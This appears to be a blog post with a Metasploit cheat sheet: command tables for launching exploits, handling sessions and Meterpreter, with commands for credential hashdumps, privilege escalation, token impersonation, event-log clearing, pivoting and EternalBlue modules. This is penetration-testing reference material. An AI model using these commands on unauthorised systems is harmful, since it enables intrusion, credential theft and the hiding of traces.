A few months ago I have created a msfvenom cheat sheet without explaining the Metasploit framework, so here it is a brief cheat sheet.
Metasploit is a free tool that has built-in exploits which aids in gaining remote access to a system by exploiting a vulnerability in that server.
General Information
Command |
Description |
---|
msfconsole |
Launch program |
version |
Display current version |
msfupdate |
Pull the weekly update |
makerc <FILE.rc> |
Saves recent commands to file |
msfconsole -r <FILE.rc> |
Loads a resource file |
Executing an Exploit / Scanner / Module
Command |
Description |
---|
use <MODULE> |
Set the exploit to use |
set payload <PAYLOAD> |
Set the payload |
show options |
Show all options |
set <OPTION> <SETTING> |
Set a setting |
exploit or run |
Execute the exploit |
Session Handling
Command |
Description |
---|
sessions -l |
List all sessions |
sessions -i <ID> |
Interact/attach to session |
background or ^Z |
Detach from session |
Using the Database
The DB saves data found during exploitation. Auxiliary scan results, hashdumps, and credentials show up in the DB.
- First Time Setup (Run from linux command line.)
Command |
Description |
---|
service postgresql Start |
Start DB |
msfdb Init |
Init the DB |
Command |
Description |
---|
db_status |
Should say connected |
hosts |
Show hosts in DB |
services |
Show ports in DB |
vulns |
Show all vulns found |
Meterpreter Session Commands
The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.
Command |
Description |
---|
sysinfo |
Show system info |
ps |
Show running processes |
kill <PID> |
Terminate a process |
getuid |
Show your user ID |
upload / download |
Upload / download a file |
pwd / lpwd |
Print working directory (local / remote) |
cd / lcd |
Change directory (local / remote) |
cat |
Show contents of a file |
edit <FILE> |
Edit a file (vim) |
shell |
Drop into a shell on the target machine |
migrate <PID> |
Switch to another process |
hashdump |
Show all pw hashes (Windows only) |
idletime |
Display idle time of user |
screenshot |
Take a screenshot |
clearev |
Clear the logs |
Command |
Description |
---|
use priv |
Load the script |
getsystem |
Elevate your privs |
getprivs |
Elevate your privs |
- Token Stealing (Windows only)
Command |
Description |
---|
use incognito |
Load the script |
list_tokens -u |
Show all tokens |
impersonate_token |
DOMAIN\USER Use token |
drop_token |
Stop using token |
Command |
Description |
---|
portfwd [ADD/DELETE] -L <LHOST> -l 3388 -r <RHOST> -p 3389 |
Enable port forwarding |
route add <SUBNET> <MASK> |
Pivot through a session by adding a route within msf |
route add 192.168.0.0/24 |
Pivot through a session by adding a route within msf |
route add 192.168.0.0/24 -d |
Deleting a route within msf |
Finding an Exploit / Payload to Use
Command |
Description |
---|
search <TERM> |
Searches all exploits, payloads, and auxiliary modules |
show exploits |
Show all exploits |
show payloads |
Show all payloads |
show auxiliary |
Show all auxiliary modules (like scanners) |
show all |
* |
My favorite
Command |
Description |
---|
use auxiliary/scanner/smb/smb_enumshares |
SMB Share Enumeration |
use auxiliary/scanner/smb/smb_ms17_010 |
MS17-010 SMB RCE Detection |
use exploit/windows/smb/ms17_010_eternalblue |
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption |
use exploit/windows/smb/ms17_010_psexec |
MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution |
use exploit/windows/smb/ms08_067_netapi |
MS08-067 Microsoft Server Service Relative Path Stack Corruption |
use exploit/windows/smb/psexec |
Microsoft Windows Authenticated User Code Execution |
use exploit/multi/ssh/sshexec |
SSH User Code Execution (good for using meterpreter) |
use post/windows/gather/arp_scanner |
Windows Gather ARP Scanner |
use post/windows/gather/enum_applications |
Windows Gather Installed Application Enumeration |
run getgui -e |
Enables RDP for Windows in meterpreter session |
External Resources